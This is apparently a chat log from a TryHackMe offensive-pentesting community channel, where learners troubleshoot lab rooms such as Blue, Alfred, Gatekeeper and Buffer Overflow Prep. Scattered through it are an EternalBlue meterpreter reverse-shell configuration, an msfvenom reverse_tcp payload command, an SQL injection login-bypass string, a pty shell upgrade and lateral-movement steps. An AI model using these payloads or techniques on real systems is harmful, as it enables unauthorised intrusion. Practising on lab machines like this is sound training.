Aahh. It is quite challenging especially if you haven't done much Windows boxes. I had to use a write up for it as a guide.

Hello everyone
In the room named "Blue"
on the second task "Gain access", I tried to run the eternal bule script, however it's not working as expected.
I have attached the log data.

Kindly help.

You are using a wrong LHOST.
It has to be set to your tun0 IP

Thanks.
I will try again.

I'm still getting the attached error.
I have changed the LHOST to my tun0 IP

` Name Current Setting Required Description

RHOSTS 10.10.39.96 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description

EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.18.3.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
`

It works now.
Thank you so much.
I don't know why errors happens though

Gave +1 Rep to @dense gate

hello i am doing gatekeeper i got this

but can't get reverse shell

any help?

it is only saying Sending evil buffer...
Could not connect.

Have not done that room yet. You sould consider looking at a write-up at this point

I have done exactly like that from alot of writeups but still no

But i get reverse shell back from my local machine

I am just have trouble calling from THM ip

"sudo disable ufw" <--- type this command and all your rev shells will connect.

hi all,

I'm currently on this room: https://tryhackme.com/room/credharvesting
In task 8 it shows that the user bk-admin is member of THMGroupReader group which has ExtendedRightHolders. Now when i rdp into the machine with the user «thm» instead of «bk-admin» i can run the command:
Get-AdmPwdPassword -ComputerName creds-harvestin
And see the password. But i though this should not be able because my user «thm» is not member of the group?

could be nested permissions down the way? Not sure have not looked at the box but was learning about it over at HTB

Hi all, I am doing the Lateral Movement and Pivoting room for AD. In Task 3 (Spawining Processes Remotely) I followed the steps and am now connected to THMIIS as nt authority\system
but when I try to run the flag.exe on the t1_leonard.summers/Desktop I get "Sorry! You are still missing something. No flag for you yet. (7)". Not sure what I'm doing wrong

hello guys i am in the alfred room , in the gaining reverse shell , i do all the requesite to obtain a shell , but nothing happens

Hello guys does someone completed the the alfred box and different shells bsh, poershell, meterpreter ?

when you say you do the requisite to obtain a shell walk us through specifically what you are doing

Back to Lateral Movement and Pivoting room for AD. In Task 4 I did the guided practical at the end but am now working through doing it via all the methods explained. I'm trying to do the Creating Remote Service with WMI. I've create the service and run it and added my user but when I try to SSH in with my newly created user I get Permission Denied

worked it out - because we are creating a local user we cannot SSH - we would need a domain user

I mean i get a revshell with ps and meterpreter but i did not get one for bash windows

I did the room a while ago so can't remember the details 100%. If you want to use the load into memory method you have to use powershell initially. I tried doing it the non-Metasploit way starting with powershell and loading into memory only and had issues with being able to run WinPEAS on the target system for enumeration. The other problem I faced was using the non-Metasploit Incognito (I don't think standalone Incognito is supported anymore, it took me ages and having to look through old GitHub to even find a binary). The alternative is to use the Potato family of to leverage the privelege vulnerability, however at that point I cracked the shits at the room and moved on. I will come back to it some time in the future to play around with it more. Motasem Hamdan on Youtube does a walkthough of the room with the non-metasploit approach using a simple netcat.

Yes i fixed the problem , and i do it with 3 methods , powershell, batch windows and metaploit, adnd for the incognito module , it worked for me , thank you a lot

Gave +1 Rep to @sharp flame (current: #1957 - 1)

hi all ! i have some trouve with room Skynet , the connection of the machine is not good , a lot of timed out :/

hi its ok today 🙂 i have fini the room 🙂 the connection is stable today !!! , can u explain me plz ? why one guy in the room have 200 points ? but all persons in the romm have 150 points ?.

First blood points, the first person to get a given flag gets bonus points

hello, I am doing Lateral Movement and Pivoting Task5 and have successfully passed the hash and spawned a command prompt. I successfully connected to THMIIS using winrs and am now trying to connect to THMIIS using PsExec using the command c:\tools>PsExec64.exe \\THMIIS.za.tryhackme.com cmd but I get the response Starting cmd.exe on THMIIS.za.tryhackme.com...yhackme.com...IIS.za.tryhackme.com... cmd.exe exited on THMIIS.za.tryhackme.com with error code 0. I have tried it with Powershell too but the same thing happens

For those of you on red team, how much programming overall is needed for your job

Meh for just pentest is basic knowledge, not programming every day

hello i need help l am studying cyber engineering and I want to become a red team member, and I have been advised to participate in CTFs, and I am also looking for a team

you can just inbox okay, tryhackme.com, hackthebox.com, ctflearn, offsec proving ground, this are platforms to get you started

okay so, is there something OTHER than immunity i can use for the B.O. section? i dont want to add in a windows VM just to do B.O. labs

Hello
I'm doing a room named "Relavent"

I'm trying to access smbclient using the following command :
`smbclient -L \\10.10.104.91\nt4wrksv -N

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    nt4wrksv        Disk      

Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.104.91 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available`

but as you can see, it is always returning error

In the walkthroughs, there is no such error. any body knows why is that happening ?

You got the file?

It's now in the directory where you launched smbclient from.

that screenshot is from the walkthrough
it doesn't show that I need to enter a password or error happening

Do you have the box open now?

my pc screenshot would like like :

you mean connected to it ? yes

I just connected and downloaded passwords.txt fine

Try using just one slash after the ip

And only two slashes at the start

Thank you so much
It worked.

I think I needed to changed the slashes as you advised and remove that -L

Gave +1 Rep to @finite pivot (current: #2 - 1897)

Yup. 🙂

any advice on how to improve my windows boxes related knowledge? I feel I am still zero in it. Linux is the best for me.

Thm has a few, IIRC.

External material is good if you can get it.

Grind them I guess - Anthem, Internal, Blue Print, Hack Park, Flatline, Blue, Atlas are ones I can think off the top of my head. Working on my Windows skills as well.

Thank you so much

Gave +1 Rep to @finite pivot (current: #2 - 1898)

Thank you so much
Is it normal to not master windows while feeling good at linux?

I suppose it is because there are more Linux boxes as creators don't have to worry about OS license unlike in Windows.

And Windows requires more resources than Linux? I think, but because Windows is so widely used in enterprise environments, you have to get well versed in it.

Thank you so much.
I thought that It's just me who is bad in windows and never thought about the number of boxes I did.
really appreciate your answers.

any recommendations for additional courses to improve my windows hacking skills except the rooms above, or that is just enough for me as a preparation step before start HTB or OSCP ?

Gave +1 Rep to @lofty sky (current: #19 - 373)

Do check Tib3rius or TCM's Windows PrivEsc boxes in THM to give you an idea on how they laid out their courses.

Thank you so much.
I will check TCM's boxes and their course then.

Gave +1 Rep to @lofty sky (current: #19 - 374)

I'm working on the ExploitingAD module. For some reason my user that I got from the distributor cannot RDP into THMWRK1 - it says timeout waiting for connection. I can ssh into it though so the machine is in fact working.

I also tried it with the t2 account that we compromised in Task2 but same thing - just times out. Can still SSH into the machine though

Hello all , i need some help plz ! in room overpass , i cant use hashcat to crack the pass with salt because my hascat give me error message : Device #1: Not enough allocatable device memory for this attack. , can we change the allocatable device memory for attack plz ? i have only 702/1468 MB (256 MB allocatable), 4MCU
Thx for helping

You're trying to crack ||the passphrase for the SSH private key|| then? I don't recall there being any password cracking outside of that within that room. If this is indeed what you are stuck on I'd try and use johntheripper if I was you.

thx you 😉 ! i'm am in the Task 2 Research - Analyse the code 🙂 last question 🙂 but i think i need to install cuda toolkit in my kali for hachcat detect my gpu 🙂

I really wouldn't bothering trying to do that, just use hashcat on your host if you need the GPU power.

ok thx you 🙂 , i increase my knowledge 😉

Hi guys I wanted to know if there is anymore cool AD boxes like razorblack? would love to practice more on AD using boxes to get my methodology right😃

good spirit

Look at Reset and Enterprise. Haven't done AD rooms yet so those two are the only ones that come to mind.

sure thank you so much😃

Gave +1 Rep to @lofty sky (current: #18 - 378)

Hey Guys! After the Jr. Pentester path and some basic paths I'm trying to complete this offensive pentesting path, but at the Buffer Overflow Prep room I was like: WHHAAAAAAAAT? I searched for easier Buffer Overlfow rooms and I ended up with "Buffer Overflows" room. I feel I'm still a bit lost so I need an advice where to start this topic? Thank you 🙂

Hello I'm having issue while connection to Exploiting Active Directory room. Used both methods as using OpenVPN and Attack Box. Not able to share screenshots here as it's only showing "Use Apps" options . Please guide me how to insert Screenshots for better understanding of issue

You'll have to verify your account to post screenshots

Can you describe the issue you are having?

1] Used OpenVPN method for connection

2] Used AttackBox for Connection but their is no "exploitad" interface available

Have you tried to vote for a network reset?

Yes

Also, do check the pinned posts in the #exploiting-ad channel to see if any would help.

I read pinned messages in #exploit-ad, the ping is working but it's not able to find THM Nameserver. What is issue here? Please explain

Did you set it following the instruction in the room? There was a command it asked you to run to set your DNS.

Are you referring to above given systemd-resolve command?

i Just finish that room on my youtube live

Yes... you must do that if you using attack box ... change the $THMDCIP base on network.

Already tried to use given command with $THMDCIP as well as $THMCHILDDC IP but it's not working as "exploitad" network interface is not present on Attack Box, Please explain me what am I doing wrong here?

Look like the attackbox does not have the interface of exploit ad

Yes, so what should I do now?

Try using tun0 as the interface then

Ok , let's see what happen then

Used "tun0" as interface with both $THMDC & $THMCHILDDC IP but still not able to connect

Which room are you doing?

He was setting up the DNS for Exploiting AD.

how do u build a dns from scratch, is it just a windows server that works like http server but instead resolves names? like a database only

hi guys ... need help ... i am doing gatekeeper and already on the box ... why the winpeas.exe not work ?

Even if the exe file matches the OS architecture (unless you are using the any version of the exe)?

i don't check the architecture i only have a 64 bit winpeas

Can you do systeminfo just to check te architecture? Or you can use the any version of the binary.

yups... i was change my payload using meterpreter session and working on it

Yeeeiiii , got something new again to learn, got the credential dumping using firefox.
Thank you for the walktrought 😅

Unquoted service path vulnerability is still an issue in Win10,11?… isn’t there any defensive mechanism that intercepts it automatically and fixes it?

any tips on understanding reverse ssh tunnels? useful rooms or walkthroughs welcome. just did game zone and am totally clueless lol

Kitty room is using ssh tunnel on priviledge ...
ssh user@ip -L port_local:local_ip:remote_port

Guys literally who is messing with .kbdx file . First after downloading the file and open the database their is no flag there and no service account instead someone make a account name Michael. Literally very frustrated with these

In which room is this occurring?

Exploiting AD users

Exploiting AD

If you can jump in general I can Screen share

Hey Guys! I have a hard time with the Brainstorm room. Firstly nobody ever found 6 open ports. At least I couldn't find any write-up with explanation why 6 is the answer... Secondly it seems like this room can't be completed in the attack box. (Is that right?) It's a bit frustrating.

IIRC you need a Windows VM with immunity debugger for the BoF

i am use the Buffer Overflow Prep Machine todo that 😅 since i don't want to install windows

hello please i need help in room skynt

nmap -A ip didn't work

else ping not working

Hello, I'd like to share this video with those interested in understanding Buffer Overflow concepts in general and preparing for Buffer Overflow Prep CTF https://www.youtube.com/playlist?list=PLRS1rLRk5OUX7-qUErv1Q7LejuwR6cvod

Try -Pn

yeah I try it thanks for your help

Hi,
I cant RDP into the VM using the command xfreerdp……

Which room are you working on?

Buffer Overflow Prep

Can't RDP into Windows 7 VM in Buffer Overflow Prep. I get this error: xfreerdp /u:admin /p:password /cert:ignore /v:10.10.99.147
[21:24:44:353] [4551:4552] [ERROR][com.freerdp.core] - transport_connect_tls:freerdp_set_last_error_ex ERRCONNECT_TLS_CONNECT_FAILED [0x00020008]

Try add /tls-seclevel:1.2 if you use version 1.2

did anyone have trouble with OVERFLOW2? I get it to crash at 2100 bytes, but the offset is wrong.

are you on Buffer Overflow Prep room? i think your offset is false.

I am doing this path and got to the Buffer Overflow section but have never done any before. What rooms I should do to learn buffer overflow before I can start the practice here?

i thing this room Buffer Overflow Prep will guide us to know how to pwn the machine

It says that "this room does not teach buffer overflow from scratch...". I'm wondering what rooms I should do to learn buffer overflow from scratch

try this one https://tryhackme.com/room/bof1

Ya… trying to figure out why. I set it to OVERFLOW2, changed scripts to OVERFLOW2, it crashes at 700 bytes initially…i tried adding bytes and it doesnt crash until 2100, and the offset ends up being 2208 which is wrong

nevermind..it works now lol..not sure what happen.

could someone go add a vote in BreachingAD to reset network? need 2 🙏🏽

Can you state you subnet? 10.200.xxx.101

The xxx will be your subnet.

haha 9

thanks!

It's just so people don't vote to reset who aren't in your subnet.

Gave +1 Rep to @limber notch (current: #1325 - 2)

ohh, yea i didnt think about that.

Hi,
In the "Hacking with Powershell" room, in Task 3, as far as I tested there is a bit of misleading information.

I can't send a screenshot, but it's in the part where the following command is explained:
Verb-Noun | Where-Object {$_.PropertyName -operator Value}

From what I tried, the Value must be in single/double quotes in order for Powershell to understand it correctly. Otherwise, you get an error

for example:

Correct form:
Get-Service | Where-Object {$_.Status -eq 'Stopped'}

Incorrect form:
Get-Service | Where-Object {$_.Status -eq Stopped}

hi - when i execute WinPeas in a compromised windows box, it does run and shows its initial checks but after a while, the shell terminal just goes blank and no output is shown in the terminal. Any idea what went wrong?

Maybe it is still hasn't completed running? I've had similar instances where it doesn't completely run even if I restart the target and execute it multiple times.

i resolved it by using its .bat version instead. For some reason, the exe seems glitchy,

Will try this one as well. Thanks for the tip.

Gave +1 Rep to @arctic quarry (current: #1332 - 2)

how to get phone number from linkedin?

What are you trying to accomplish?

does someone know if the brainstorm room is working correctly? I cant list the files when connecting to ftp, it shows '229 Entering Extended Passive Mode (|||49379|)' Im not sure if iI need to do something else

also, the first answer is 6 open ports but I never found 6 open ports even with udp scan i only found 3

You can type passive off

idk but are try with tag -p- with -Pn

how did this got resolved? Please assist

Hackpark Box: Task 3 : i uploaded the PostView.ascx file and then tried to get reverse shell but i get error : Ooops! An unexpected error has occurred.
This one's down to me! Please accept my apologies for this - I'll see to it that the developer responsible for this happening is given 20 lashes (but only after he or she has fixed this problem).

Does anyone has clue ho wto solve this hurdle here : the command which I gave on the browser is http://10.10.216.235/?theme=../../App_Data/files

Make sure you are using the LHOST address while updating the exploit code - silly mistake at my end

It’s can happen to anyone

I am having an issue with the Skynet room. I keep getting this error any time I try to connect to the smbclient "session setup failed: NT_STATUS_LOGON_FAILURE", any help?

What is your complete smbclient command?

smbclient -U milesdyson \\\\10.10.52.205\\milesdyson

Are you certain you have the correct password?

Yeah

Did you manage to make this work?

Yeah I managed to. Thanks

Gave +1 Rep to @lofty sky (current: #14 - 488)

Hey Void, I'm having the exact same issue, oh wow 2 YEARS later! DId you manage to fix the error?

Hey everyone, I've recently been working through the THM path on buffer overflows and have been doing Brainstorm, a simple windows box running a vulnerable program called Chatserver.exe. I want to run Chatserver.exe on my local windows machine to test my payload, but I just keep getting this error (below). I've used windows10-32bit, tried windows11-64bit virtual machines, and I've tried it on my local windows desktop (very unsafe of course) but to no avail. It also doesn't seem to be working on my kali computer. Any tips? Anyone else had this problem? Any help is so appreciated! 😄

Hey there! Wow what a long time ago hahaha

For the solution (that solved it in my case) just scroll down a bit from that message

Oh wait I take that back, I guess I was never able to solve it 😅

Crazy right! I tried using a virtual machine (using virtual box) pretty sure this is just all the default settings from the official windows iso image. But still no luck.

Any idea what daft mistake I've made?

(thanks for the reply btw!)

oh XD

I might just have to skip this one for now...

All the other buffer overflows have been fine.

👍

Hey just wondering (sorry to disturb you) but did any of the other boxes work for that section? I'd just like a heads up before I waste time wrestling with them.

Hey no worries 😄 I honestly don't remember since it happened so long ago

DMd you

All of the file extensions are not allowed. Why is it?

This room needs to be updated. When selecting position when fuzzing the file extension, don't include the . and also remove the . on your phpextension list file

Is this Vulnversity? Do you have the correct directory?

Hi, everyone

Hey!

Hi

Hey

https://cdn.discordapp.com/attachments/1183741406678884352/1239625965714280519/Revivan_el_sv-1.mp4?ex=665761a5&is=66561025&hm=10c41326e89d6405e614e77ce9f6396cdd808bc3958aeaaad93a18c34d0f4124&

I am studying the PJPT and we are using the same material from my understanding. I wouldn’t mind

I am in the TCM Security discord group as well and the general consensus is that using their material is more than sufficient. Also, please use other channels as this is for THM's Offensive Pentesting learning path 🙂

Hey THM Community! For those that want to enhance your knowledge in network pivoting for HTM's boxes, I've just uploaded a video on YouTube on how to use chisel and socat tools within a corporate infrastructure to move within different networks.

https://youtu.be/h8ITLYekt6I

Might be better posted in #thm-community-media I guess?

Can anyone sniff-test gatekeeper for me?
Yesterday I couldn't get the buffer overflow (using the recipe that had worked previously) and today no ports are open on the machine 😖

It's been up for ~10m by now (free user)

What's the ip?

10.10.248.96
up for 30m now.

Just before I check.

You remember it's a Windows box, right?

100%

Are you suggesting there's something banning my IP due to the portscan?
Cause SMB and everything else isn't coming up either.

(I suspect it may be a VM resource issue)

Nope, no ports, I'd reboot.

I booted a clean machine up and got ports.

Hey got a quick question on the Lateral Movement and Pivoting room any free to help?

I've been doing a series of livestreams as I progress thru this learning path, this is the most recent addition (started a bit late in the path)

https://www.twitch.tv/videos/2180652288

This was a fun one, This time I had to write an exploit for a server where I didn't have the ability to debug the actual instance I was exploiting.

Had to setup my own Windows VM and write the exploit there, change my payload and then deploy it on the "live" service.

Sure enough I got a shell at the end 🙂

https://www.twitch.tv/videos/2181758592

Thinking about doing this pathway and saw there was a buffer overflow section. Does it teach you how to perform buffer overflows or do you have to learn it on your own?

both

teaches you how to write them, preforming them is optional. but i like to get shell for each one

This is me going thru OVERFLOW7 somewhat quickly, after spending 5min figuring out how/why port was in use

https://youtu.be/t9okoKh9L0Y?t=260

And done 🙂

https://tryhackme-certificates.s3-eu-west-1.amazonaws.com/THM-TRZJHGAQO6.png

for the GameZone room, why do I need to include the - at the end when the -- before it should start the comment and comment out the rest of the statement?

this is the sql they say to input:

' or 1=1 -- -

I read somewhere that it is to "protect" the space after the -- as it sometimes gets filtered.

Thank you! That makes sense. I'm guessing in that THM room they must be doing that filtering. I was curious because everything I looked up said a comment was just '--', so I wanted to know the purpose of the last '-;

È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement

Anybody know if this means UAC bypass might be possible?

I am currently having a bit of difficulty with the room Alfred on the Offensive Pentesting Path. Is this the best place to reach out for some potential guidance?

I'm not exactly sure what the problem was, but after a couple of hours, I got it figured out. There was some problem with how I was downloding the .ps1 script.

For the skynet room the connection to the box is having a bunch of connection issues, especially with samba.

It takes at least 10 seconds for what I type to show up in the terminal, and I keep getting timeout errors running basic commands like 'cd', 'ls', 'get', etc....

I'm using the VPN connection from my own Kali instance, but I never experienced errors like this before using it.

Think it's your shell try. Python -c 'import pty;pty.spawn("/bin/bash")'

This path requires me to understand buffer overflow?

there's a module about it in the course so you'll do fine following up

i'm amidst of it

Quick question on overpass2

you mean the prep room?

||found the backdoor and all, and i'm on cracking the hash but it doesn't seem to be salted as just by reading it and even hashcat/hashid don't see it salted, has something changed or is it just the working of my tools that is weird?||

i mean there's a whole section about buffer overflow

yeah ik, the first one is a ctrl+c and ctrl+v the other ones are challenges

oh you gotta check the github

don't only copy/paste try understanding what it does ^^

gosh just realized what i missed....; thanks!

Gave +1 Rep to @bright wing (current: #1096 - 3)

you're welcome, ngl it isn't your fault, the questions were unclear

Trying to do the Overpass 2 - Hacked room but... when trying to do the 2nd question, it's not working and in Wireshark I'm getting this payload.

It's the symbols, it's a known issue. 🙂

Anyone have any tips for dealing with the rdp machine on BOF Prep room room crashes or freezes every two seconds lol

really sucks

ya its basically impossible to work with/ i tried to use the VIP VPN too but not really any differant

for the buffer overflow challenges, how do you solve these without having to set up a brand new vm with windows and immunity debugger? We really should have a windows machine available with immunity debugger in those 3 rooms.

+1

Why is the offensive penetrating path not there on the new THM roadmap?

What are you referring to as new roadmap? It still is listed in mine -

I assume he means https://tryhackme.com/r/hacktivities

Indeed, not all available paths are included in the roadmap. 🙂

If I may ask, is there a specific reason for it? Because doing the Offensive Pentesting Path before the Redteaming would make sense right?

Not sure about the exact reason, although I imagine it has overlap with the Jr Penetration Tester path, so it might be a matter of selection.

How do I get started in cybersecurity so that I can hack like a Black hat hacker and secure them like a cybersecurity expert

Do check the #start-here channel.

Think which other rooms have such a machine already... 😈

Hello everyone,

I have completed the following paths:

• Jr Penetration Tester
• Web Fundamentals
• Web Application Pentesting

Then, I started the Offensive Pentesting Path and managed to go through Getting Started and Advanced Exploitation without any issues. However, I don’t feel ready for Buffer Overflow and Active Directory yet.

Do you think it would be useful to complete the Red Teaming Path first and then return to finish Offensive Pentesting?

Yes 🙂

Conplete it first and after it do some x86 rooms

Thanks

Gave +1 Rep to @lean scaffold (current: #1 - 3910)

Hi there, I'm getting some DNS issues in order to start with Active Directory breach scenario. What's the best way to proceed?

Hi all, is anyone having issues with the Enumerating Active Directory VPN profile? Seems to be corrupt every time I try to download it.

leave the room and re-join , then try to download vpn file again

Thanks @lean scaffold ,still isn't working though. Downloading a blank file 🫤

Gave +1 Rep to @lean scaffold (current: #1 - 4085)

Are you a premium user ?

Yea, streak is on 148 too

Have you started the network beforehand ?

yea once, think it was couple days ago now

Can you try to restart the network ?

Yup we're all good now, thanks @lean scaffold 🫡

Gave +1 Rep to @lean scaffold (current: #1 - 4087)

If anyone here has a small study group for OSCP prep, please DM me or add me in there. I'm going through THM rooms for now. We can perhaps learn together.
PS: if such posts are not allowed here, please let me know so I can delete this.

Yes

Try to ask guys in #cyber-and-careers channel , guys there can give you some great cert. advice 🙂

hi mod how to get OSCP tag.
where can i send proof or something to get a tag.

Hi 🙂 . Try to reach out to Jabba or Scrubz , I don't think I have a permission to give roles yet 🙂

hey guys

anybody herer solved kenobi??

when i try to mount the share point i am getting errors

What is the exact command you are running? Can you share a screenshot of it (you'll need to verify your account to do so)?

@slender ridge

I'm running into issues on task 4 of Steel Mountain. Skipped it and finished Alfred but don't want to keep skipping it since I feel like I must be doing something wrong. I am getting an error when trying to serve the NC library over port 80 since it's apparently already in use? Is there a way to force the python script to download the ncat library over a different port? Or a way to stop whatever is on port 80 without crashing the attack box?

Can you provide some shots ?

Uh, I'm trying to share but it's saying attachments are disabled. You can replicate in any Linux attack box with the command "python3 -m http.server 80" where again, 80 is already in use by something.

I ended up completing it by cheating a bit and running the python server to host the file on a different port and encoding ":port#" in the text string of the exploit so that it would pick up the NC library over a port not being used because I was a bit impatient 🙃

But that should for sure be amended for future users.

You will have to verify first

The Attackbox is using port 80 for it to be accessible via web.

That makes sense. Glad I figured out a workaround but there should probably be a note in any room expecting to serve files over 80 that it for sure won't work then, right? That's hella confusing for someone who might not have as much "hacking" experience (read: breaking stuff to make my own crumby web stacks work)

Is there a way to do that over email? Would rather not give discord more info just to send a screen cap but I would love to see this clarified for future users

To clarify the room suggests you can run a script that will download the file but it never works since you can't serve a file from the attack box off of port 80 (you get an error saying it's in use) and that's the only place the script looks (unless you modify it to look for the file at a different port)

wdym more info lol

discord can't do a thing with the provided token and doesn't even have an idea what it's for.

Do you have another method of reporting a bug in a room that isn't discord like an email or a chat on the site itself? That would be helpful info 😁

The THM discord verification only involves putting in the token to the THM discord bot

@timber wind

Am I doing something wrong in the alfred room (upgrading to metasploit/Task 2) or is this just msfjank? Tried a couple times but not getting much success even rebooted the box a few times

What payload are you using?

It's an msfvenom payload from the task
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai
I set the IP to my tun0 interface, and the port to one I know isn't behind a firewall, then set up the listener with
windows/meterpreter/reverse_tcp

I got it, it was me being dumb!! I was trying to kick the stager off via a jenkins build job and not via the initial shell

root.txt acquired

❓ For https://tryhackme.com/room/hackpark , task 4 I know which binary it is, but I would like to find out which process/mechanism is responsible for spawning this binary periodically? It doesn't seem to be due to a service or a scheduled task, though I may be wrong as Windows is not my forte.

Are you referring to the || Windows Task Scheduler ||?

Indeed, I would expect ||Windows Scheduler|| to periodically execute ||Message.exe||. However, I ran schtasks /query /fo LIST /v to get the details of every scheduled task and none is referencing ||Message.exe||. Unless one of these tasks is indirectly calling ||Message.exe|| I don't understand how it is getting spawned.

There is one log file you will see where || Message.exe|| is being run or called. Can't remember if it is on the same folder.

Ok, I finally understand. This setup is not using the standard Windows Task scheduler, it's using a 3rd party tool: System Scheduler Professional. That's why schtasks was useless. Thanks @lofty sky

Gave +1 Rep to @lofty sky (current: #12 - 835)

Hope it helped. Also, just notice your pfp corresponds to the room's theme.

Hehe, true 🤡 Thanks for the help. I learned a ton from this little side step and that's what matters.

Just spent the last 20 minutes setting up a meterpreter session to try to escalate to root on Overpass 2 before I finally remembered to look at the files

I made chatGPT roast me and dude is savage

Do most people use their own machine when engaging with content on this path? Kinda confused with the buffer overflow stuff as everything is taught in windows then I guess they expect you to create a buffer overflow using Linux all of a sudden? I guess I could go off path and do another module but kinda weird structure unless I'm missing something major

If any application is allowing PUT method to perform certain action instead of POST method. Then how we can exploit PUT API and they have implemented strong check on payload and role based access control

Is this related to any THM specific room in the learning path? If not, suggest to post this in #infosec-general

Hello everyone, I am extremely curious about the effectiveness of THM for offense, please share your thoughts so that I don't waste my time

wdym ?

Hi

I could send any message in looking for a group

It says to go to offensive path

Event is over , #1385311669256982608 channel isn't active anymore 🙂

When will it get active?

It won't , event is over . It will be deleted

Okay

sed

Hi

sup?

How are you?

am fine you?

Fine

cool

Would you like it to be my friend

By the way does anyone have any advice on the brainstorm room because when I run chatserver.exe in the windows vm and then try to nc on port 9999 it says connection refused but the windows machine doesn't even have a firewall

It works on the actual tryhackme spawned server but when I download it and put it on a vm it doesn't work anymore

👋 hey all Trying to exploit a web server for a ctf challenge, I’m searching metasploit for a vulnerability on an Apache server.

Apache / 2.4.41 (Ubuntu)

When looking into exploits how important is the version to the exploit?

When I search the whole server info nothing comes up, but I get many results for Apache

It's very important you need to use the version of exploit that targets the vulnerable version of the software used by the web app , ex: exploit for Apache 2.4.42 won't work for your target

Hello hackers, i need a lil help with setting up DNS for Breaching Active Directory... Can anyone help?

#breaching-ad

Did you get it working?

still fighting with chatgpt to help me..

if you can.. please

i am trying to setup on my kali

add nameserver <THMDCIP> into /etc/resolv.conf and add it above the other entries that worked for me.

I am on the attackbox so results may vary.

Hello guys, i am having a difficulty with my first room

It's wordlist.txt not worldlist.txt 🙂

Thanks

Gave +1 Rep to @lean scaffold (current: #1 - 5741)

Greetings. I would like to ask for your opinion on report writing. I had followed the writeup in room relevant, as well as room writingpentestreports to understand the way to write a report. My problem is how do you determine what type of vulnerabilities they are for those encountered in relevant since it require ||1. a writable smb share 2. IIS server that links to the directory of the share to trigger the payload.|| Do you write 2 vulnerabilities or name them as 1? What will be the title of the vulnerability? How do you determine the risk rating? Is it thru look for similar one in cve database for CVSS rating?

As for the CVSS rating, you may find the CVSS Calculator useful:
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator

I'm not a pentester by profession, but IMHO, I would put in two separate vulnerabilities (which are both misconfigurations). However, I will indicate on the IIS server issue that it can be chained with the writable SMB share.

Thank you for both of your replies. Regarding the risk rating, most report in https://github.com/juliocesarfort/public-pentesting-reports seems to use their own qualitative rating instead of cvss. One report Pentest-Limited/Report URI - 2020 Penetration Test Report.pdf even mentioned they use both since the cvss is not enough to cover all risks which makes some of the vulnerabilities without cvss rating. What is your opinion on their choices? Is it better to stick to cvss rating like the writingpentestreports room and why?

Please is anyone into secure side review lately am looking for someone to do it with

Hello

Hi whats the version used in the machin in vuln wuiz

I lost the version

@lean scaffold can you help sir?

regarding ?

The bot didnt start so I so I skipped first wuizz

Now I cannot proceed to
The next wuiz

What will I do?

guys i hit start machine and it just doesnt load anything it says im active on it, but it literally doesnt show up, is this okay? im new to thm

If you can verify your account and share screenshots or images, that would be helpful.

Hi! About the Relevant machine: it constantly 'disappears' from the network after deploying it (I am almost sure why, but cannot guarantee it). It happens every ~15-20 minutes and I have to re-create the machine in the web portal.

Is there a way to have it not crash constantly? Or to have a better availability towards it?

The Gobuster: The Basic (Task 4)
:~/Desktop# gobuster dir -u "www.offensivetools.thm" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://www.offensivetools.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s

Starting gobuster in directory enumeration mode

Error: error on running gobuster: unable to connect to http://www.offensivetools.thm/: Get "http://www.offensivetools.thm/": dial tcp: lookup www.offensivetools.thm on 127.0.0.1:53: no such host

No such host , how i can reach the and finish the task?

Configure DNS settings per task instructions then run these commands to restart the service
sudo systemctl disable systemd-resolved sudo systemctl stop systemd-resolved /etc/init.d/dnsmasq restart

Thank you but i supposed at first create new resolv-dnsmasq , because there been some other ip

+rep

has anything happened with the https://tryhackme.com/room/bufferoverflowprep room?
Yesterday it was available but now now it can't be found
It is still referenced by the learning path https://tryhackme.com/path/outline/pentesting

.